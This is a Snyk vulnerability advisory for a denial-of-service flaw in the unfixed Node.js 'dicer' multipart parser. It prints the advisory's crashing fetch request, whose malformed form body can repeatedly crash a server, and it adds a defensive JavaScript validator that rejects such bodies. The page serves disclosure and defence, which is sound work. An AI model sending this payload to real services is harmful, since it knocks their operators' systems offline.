Denial of Service (DoS) Affecting dicer package, versions *



    Attack Complexity Low
    Availability High

    Threat Intelligence

    Exploit Maturity Mature
    EPSS 0.11% (44th percentile)
7.5 high

  • Snyk ID SNYK-JS-DICER-2311764
  • published 19 May 2022
  • disclosed 7 Dec 2021
  • credit Aras Abbasi

How to fix?

There is no fixed version for dicer.


Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can send a modified form to the server and crash the Node.js service. The attacker can send the payload again and again so that the service crashes continuously.


    // Request from the advisory that crashes the service
    fetch('form-image', {
      method: 'POST',
      headers: {
        ['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro',
        ['content-length']: '145',
        host: '',
        connection: 'keep-alive',
      },
      body: '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n------WebKitFormBoundaryoo6vortfDzBsDiro--'
    });
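
Since there is no fixed version, one mitigation is to refuse malformed multipart bodies before they reach a dicer-based parser. The check below is an added example, not code from the advisory or from dicer. It assumes the body is already buffered under a size limit, and it assumes the relevant feature of the payload above is that the part's first header line starts with whitespace; `checkMultipart` and the sample bodies are hypothetical and constructed.

```javascript
'use strict';
// Added example, not dicer code. Assumption: bodies shaped like the payload
// above (first part-header line starting with whitespace) must be refused.
const CRLF = '\r\n';
const FIELD = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+:/; // RFC 7230 token, then ':'

function extractBoundary(contentType) {
  const m = /boundary=(?:"([^"]+)"|([^;\s]+))/i.exec(contentType || '');
  return m ? (m[1] || m[2]) : null;
}

// Hypothetical helper: returns { ok: true } or { ok: false, reason }.
function checkMultipart(contentType, body) {
  const boundary = extractBoundary(contentType);
  if (!boundary) return { ok: false, reason: 'missing boundary' };
  const text = Buffer.isBuffer(body) ? body.toString('latin1') : String(body);
  // Delimiters sit at the start of a line, so split on CRLF + "--" + boundary.
  const segments = (CRLF + text).split(CRLF + '--' + boundary);
  for (let i = 1; i < segments.length; i++) {
    const seg = segments[i];
    if (seg.startsWith('--')) return { ok: true }; // closing delimiter reached
    if (!seg.startsWith(CRLF)) return { ok: false, reason: `part ${i}: bad delimiter line` };
    const end = seg.indexOf(CRLF + CRLF);
    if (end === -1) return { ok: false, reason: `part ${i}: unterminated headers` };
    let seenField = false;
    for (const line of seg.slice(CRLF.length, Math.max(end, CRLF.length)).split(CRLF)) {
      if (line === '') continue; // part without headers
      if (line[0] === ' ' || line[0] === '\t') {
        // Folded continuation: only valid after a real header field.
        if (!seenField) return { ok: false, reason: `part ${i}: continuation line before any header` };
      } else if (!FIELD.test(line)) {
        return { ok: false, reason: `part ${i}: malformed header line` };
      } else {
        seenField = true;
      }
    }
  }
  return { ok: false, reason: 'missing closing delimiter' };
}

// Constructed samples (not captured traffic).
const CT = 'multipart/form-data; boundary=XBOUNDARY';
const GOOD = '--XBOUNDARY\r\nContent-Disposition: form-data; name="a"\r\n\r\nhi\r\n--XBOUNDARY--';
const BAD = '--XBOUNDARY\r\n Content-Disposition: form-data; name="a"\r\n\r\n\r\n--XBOUNDARY--';
console.log(checkMultipart(CT, GOOD), checkMultipart(CT, BAD));
```

Respond with HTTP 400 when `ok` is false and pass the body to the multipart parser only otherwise.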